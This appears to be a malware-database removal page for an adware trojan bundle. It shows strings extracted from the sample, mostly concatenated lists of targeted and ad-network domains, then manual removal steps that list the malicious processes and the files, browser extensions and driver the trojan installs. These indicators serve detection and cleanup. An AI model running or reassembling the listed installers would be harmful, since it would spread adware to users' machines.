.sarkariresult.comsammobile.comsamequizy.plsabah.com.trruten.com.twrussianfood.comrussian7.ruruliweb.comru-m.orgrst.uaroblox.comriovagas.com.br
.ricardoeletro.com.brria.comreverso.netremontka.prorecord.ptrealitatea.netrbc.rur7.comquizzstar.comquikr.comqtipr.comqatarliving.computhiyathalaimurai.com
.pure-t.rupt.bigtests.clubprotothema.grpronews.grprobuilds.netprnt.scprice.com.hkposta.com.trpontofrio.com.brpoki.compointemout.compizap.com
.pesmaster.compciconcursos.com.brpasted.coparaloscuriosos.comparaguay.companzoid.comozee.comoyunskor.comoyunkolu.comouterspace.com.brouedkniss.com
.otzovik.comosuskinner.comonlinesoccermanager.comonliner.byonet.ploneindia.comolx.uaolx.roolx.ptolx.plolx.com.pkolx.com.egolx.com.brolx.co.idolx.ba
.okezone.comojogos.com.broitestes.comnovaskin.menosalty.hunk.plnjuskalo.hrnfscars.netnexusmods.comnextdeal.grnewssci.comnewsnow.co.uknews24.com
.news18.comnetshoes.com.brnet-empregos.comneedrom.comnaukri.comnametests.comnamemc.commynet.commyjoyonline.commydiv.netmyclosettoyours.commusica.com
.mundodeportivo.commundo.commultoigri.rumudah.mymsn.commope.iomoneycontrol.commojekrpice.hrmodxvm.commods-fs.netmodland.netmoddb.commobile01.commobile.bg
.mob.orgminutouno.comminhavida.com.brminhaconexao.com.brminecraftskins.comminecraftsix.comminecraftmaps.comminecraftforum.netminecraftforge.netminecrafteo.com
.minecraft-mp.comminecraft-inside.rumilliyet.com.trmeutimao.com.brmetropolitanafm.com.brmetrolyrics.commemurlar.netmemoryhackers.netmediafire.com
.mcskinsearch.commcleaks.netmaxthon.commathrubhumi.commasr140.commarvelousga.commarocannonces.commarca.commanualslib.commanoramaonline.commangadeep.com
.makeuseof.commakeleio.grmail.bgmagazineluiza.com.brmackolik.comls2013.comlove.huloudgames.comlottosociety.comlolskill.netlolnexus.comlolcounter.com
.listenonrepeat.comliputan6.comlinkmyc.comlikenation.comlifedaily.comliberal.grletour.frleboncoin.frleagueskin.netlcpdfr.comlavanguardia.comlatercera.com
.larousse.frlacuarta.comkwejk.plkupujemprodajem.comkraloyun.comkraljevstva.comkooora.comkongregate.comkomputerswiat.plkompas.comkizlarsoruyor.comkizi.com
.kaskus.co.idkaidee.comjutarnji.hrjuegos.comjoystamps.comjoygame.comjogos360.com.brjofogas.hujeuxjeuxjeux.frjeux.frjbzdy.pljavatpoint.comjatek-online.hu
.jaidefinichon.comjagran.comistitlaa.meirr.ruirctc.co.iniol.ptinvestopedia.comintoday.ininternethaber.cominteria.plinstructables.cominquirer.net
.infomoney.com.brinfojobs.com.brinfobae.comindiatimes.comindianexpress.comindia.comindex.hrimgrum.orgign.comigli5.comig.com.brieltsmaterial.com
.i3investor.comhurriyet.com.trhihi2.comhibapress.comhi5.comhespress.comherozerogame.comhearthpwn.comhealthbeautytipss.comhdwallpapers.inhdnicewallpapers.com
.hasznaltauto.huhardverapro.huhamariweb.comhackerexperience.comhaberturk.comhaberler.comhaber7.comgyakorikerdesek.hugw2efficiency.comguru3d.comgtainside.com
.gtaall.comgsurl.ingsp.rogsmhosting.comgsmarena.comgry.plgry-online.plgotoshop.net.uagomez-pictures.comgokano.comgoal.comgittigidiyor.comgismeteo.ru
.girlsgogames.rugirlsgogames.comghanamotion.comgezginler.netgen.trgem-flash.comgeeksforgeeks.orggazzetta.grgazetevatan.comgazeta.plgartic.com.brgamevui.vn
.gametop.comgamesgames.comgamesbarq.comgames.co.idgamersclub.com.brgamepressure.comgamepedia.comgameofglam.comgamemodding.netgamekit.comgamejolt.com
.gamefaqs.comgamebanana.comgame-game.com.uagame-debate.comgaana.comfutwatch.comfutbolarena.comfreestreet.gamesfreesteamkeys.comfreepik.esfreepik.com
.free-gg.comfotostrana.rufotor.comfotomac.com.trforum.hrflightradar24.comfishki.netfirmwarefile.comfilerio.infilehorse.comfilehippo.comfilchostgurru.com
.fb.rufastcup.netfanfiction.netfanatik.com.trezoworld.huextra.com.brexpress.co.ukexpatriates.comevz.roettoday.netets2.ltespncricinfo.comeobot.com
.ensonhaber.comennaharonline.comenikensky.comeluniversal.com.mxelmundo.eselitepvpers.comelektroda.pleleconomista.eselconfidencial.comel-nacional.comeenadu.net
.ebonus.ggebay.comebay.co.uke-onec.comdrive2.rudownload.com.vndonanimhaber.comdogry.pldocuments.tipsdobreprogramy.pldinamalar.comdigisport.rodiep.io
.detik.comdesafiomundial.comdella.bydcnews.rodailyentertainments.comcut-urls.comcurse.comcuanto-sabes.comcsfd.czcricbuzz.comcontextotucuman.com
.commentcamarche.netcoco01.netcnnturk.comcnet.comcmjornal.ptclubic.comclubedohardware.com.brclickjogos.com.brclangsm.comclaimwith.mechordtabs.in.th
.chess.comcharter97.orgchampion.ggcerpen.co.idcelibatairesduweb.comcatracalivre.com.brcatfly.com.brcatfly.comcasasbahia.com.brcaracol.com.cocar.gr
.capital.grcambridge.orgboredpanda.combongda.com.vnblogspot.mxblogspot.inblogspot.grblogspot.com.trblogspot.com.esblogspot.com.egblogspot.com.arblitz.bg
.bleepingcomputer.comblastingnews.combiobiochile.clbdjobs.combbc.combazos.czbaomoi.combandab.com.brbaixaki.com.brbadoo.combabycp.comavito.ruavaz.ba
.autovit.roauto.ruauction.bgaternos.orgarmorgames.comaristeguinoticias.comarchive3d.netarcai.comaqovd.comapkpure.comapkmirror.comapichoke.bizanswers.com
.androidfilehost.comamoryamistad.com.coamordoce.comambito.comalmaany.comallkpop.comall-free-download.comaksam.com.trakinator.comaglasem.comagar.ioagame.com
.adme.ruadevarul.roaddictinggames.comaccuweather.comacademia.eduabv.bgabril.com.brabola.ptabc.esa10.coma1.ro9minecraft.net9alami.info4j.com
.criteo.com
.g2a.com
.banggood.com
.souq.com
.jumia.io
.jumia.macicm
.jumia.com.egnggh
.jumia.co.ke
.alza.cz
.submarino.com.br
.netshoes.com.mx
.shoptime.com.br
.linio.com.mx
.pccomponentes.com
.kaspersky.com
.prozis.com
.snapdeal.com
.kanui.com.br
.daraz.com.bd
.malwarebytes.com
.alza.czhu
.bigpicturepoponclkdsexdynsrvtummiarunzpfadventurefeedscodeonclickadk2xcpxdelivemjcdcommission-junctionafcyhfvofzpwhycemlcualbrawxibrmrnsfpwlduhtrptqlkgawltovhc.com
.ftjcfxanrdoezrstkqlhcedpbolvwkqzyfjjdoqocyapmebfkdukvhpkracvdotomimplxtmsmjbpab.com
.onclickadsclick-cpapopadsqksrv.net
.adplex.media
.bestwebdeals.online
.admitad.com
.qatarairways.comadmitad.comarea51buy.com
.latamlantwoptripapycomm.com
.despegar.clco.crcom.arcom.cocom.eccom.mxcom.pecom.vecom.uycom.pacom.eccom
.knowbrid.com
.area51buy.comamericanas.com.br
.accorhotels.com
.travelmap.cf
.wildberries.ruwildberries.byarea51buy.comgrifanme.com
.ecomface.com
.xvideos.com
.trafficfactory.biz
.lovense.com
.bet365.com
.posthaus.com.br
.tomtop.com
.rosewholesale.com
.submarino.com.brarea51buy.com
.americanas.com.br
.despegar.
.click.linksynergy.com
.soicos.com
.lazada.co.idcom.mycom.phvnco.thsg
.amazon-adsystem.com
.media.net
.serving-sys.com
.propellerads.com
.mob.orgzlx.com.brzengaming.comzedo.comz-shadow.coyimg.comyeadesktopbr.comyeadesktop.comyapo.clyahoo.comyadi.skxtraaa.comxscores.comxe.gr
ekrn.exeKHClient.exeRelayClient.exeWebCacheClient.exe
svchost.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
combase.dll
mscoree.dll
kernel32.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
2.exe
\*.cer
\trec.tmp
\x.tmp
\xtls.tmp
\xv.tmp


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    brastub6ab_amobl_inst.exe:3884
    csc.exe:1780
    csc.exe:1992
    csc.exe:3712
    setup.4.15.f.exe:2796
    enjoyWIFI.exe:2704
    cvtres.exe:2872
    cvtres.exe:1692
    cvtres.exe:948
    adv_334.exe:3644
    adv_334.exe:1504
    schtasks.exe:1084
    schtasks.exe:3636
    schtasks.exe:3944
    schtasks.exe:1720
    Setup.exe:2448
    Setup.exe:4028
    starter.exe:3588
    ytab_m_1_big.exe:3664
    ytab_m_1_big.exe:2980

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabE58D.tmp (51 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\s4[1].ashx (342 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_del.bat (299 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarE58E.tmp (2712 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\18d11d6bcfa143319d89ee15d7989e1c\brastub6ab_amobl_inst.exe (54468 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0af7676060534b0ab7c9dbae31d28aae\Setup.exe (34372 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.out (455 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.0.cs (676 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\d44724a9212341309f18eefcfdd9b06c\setup.exe (407464 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59f124f63a374212b0ef101e658ab10f\enjoyWIFI.exe (240166 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.0.cs (1444 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\b6142ece028a474c9d04d9344fbbe359\ytab_m_1_big.exe (252126 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.out (455 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.cmdline (388 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\193351eab5ff42369b2ed8f5929eb197\Setup.exe (80632 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\e3b3a628d7fa4f019f25eea6f351c9fd\starter.exe (218030 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.out (455 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.0.cs (5572 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\g3tjlr04.dll (3662 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2931.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\pledmvys.dll (2490 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2B82.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CSC2C4D.tmp (652 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\wr-cs10y.dll (4304 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\uninstall EnjoyWiFi.lnk (978 bytes)
    %Program Files%\EnjoyWiFi\x86\wfcre.sys (2480 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\wftinst.dll (29506 bytes)
    %Program Files%\EnjoyWiFi\enjoywifi.ssf (4768 bytes)
    %Program Files%\EnjoyWiFi\x64\wfcre.sys (5589 bytes)
    %Program Files%\EnjoyWiFi\wfcrecf.dll (5260 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EnjoyWiFi\EnjoyWiFi.lnk (995 bytes)
    C:\Windows\System32\drivers\wfcre.sys (3616 bytes)
    C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshBE8E.tmp\System.dll (23 bytes)
    %Program Files%\EnjoyWiFi\uninst.exe (5166 bytes)
    %Program Files%\EnjoyWiFi\inst.db (5 bytes)
    C:\Users\Public\Desktop\EnjoyWiFi.lnk (977 bytes)
    %Program Files%\EnjoyWiFi\EnjoyWiFi.exe (22850 bytes)
    %Program Files%\EnjoyWiFi\wftinst.dll (14753 bytes)
    %Program Files%\EnjoyWiFi\zlib.dll (925 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00011657\setup.4.15.f.exe (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2932.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2B93.tmp (3666 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\RES2C4E.tmp (3666 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\tr\messages.json (141 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\cs\messages.json (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\bn\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon48.png (2 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fil\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\th\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sq\messages.json (171 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (15861 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\vi\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bg\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\computed_hashes.json (30 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fr\messages.json (190 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ko\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\da\messages.json (153 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js_temp (776 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\de\messages.json (157 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_GB\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\id\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\de\messages.json (157 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\gu\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\files\foreground.js (2 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hu\messages.json (156 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\it\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\no\messages.json (152 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_CN\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\kn\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\be\messages.json (204 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sk\messages.json (143 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ms\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\Kernel.js (38 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\23B523C9E7746F715D33C6527C18EB9D (325 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_CN\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\uk\messages.json (198 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\gu\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon16.png (704 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\he\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sw\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en_US\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\install.rdf (16 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\zh_TW\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\he\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sv\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\background.html (77 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ja\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\bn\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\pt\messages.json (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\be\messages.json (204 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hr\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_metadata\verified_contents.json (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\foreground.js (2 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\fi\messages.json (133 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ml\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\zh_TW\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\te\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sw\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sl\messages.json (138 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\et\messages.json (127 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\bindings.xml (1 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt_BR\messages.json (161 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ru\messages.json (262 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ar\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\es\messages.json (186 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\bootstrap.js (15 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\th\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\am\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\hi\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\el\messages.json (197 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\it\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\lv\messages.json (149 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ko\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\23B523C9E7746F715D33C6527C18EB9D (876 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lt\messages.json (149 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\hi\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome.manifest (78 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\mk\messages.json (194 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\es_419\messages.json (186 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\en\Content.js (2 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\cs\messages.json (144 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\te\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\sv\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fi\messages.json (133 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\en_US\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\lv\messages.json (149 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ms\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\skin\styles.css (263 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\sl\messages.json (138 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\tr\messages.json (141 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\icons\icon128.png (7 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ta\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\id\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\ca\messages.json (152 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ta\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\nl\messages.json (153 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\fil\messages.json (150 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\pt\messages.json (161 bytes)
    %Program Files%\Mozilla Firefox\browser\features\{5C3FD6D1-9185-4195-B5E1-FAB622427F59}\chrome\_locales\ja\messages.json (150 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmhomipkklckpomafalojobppmmidlgl\0.1.4_0\_locales\uk\messages.json (198 bytes)
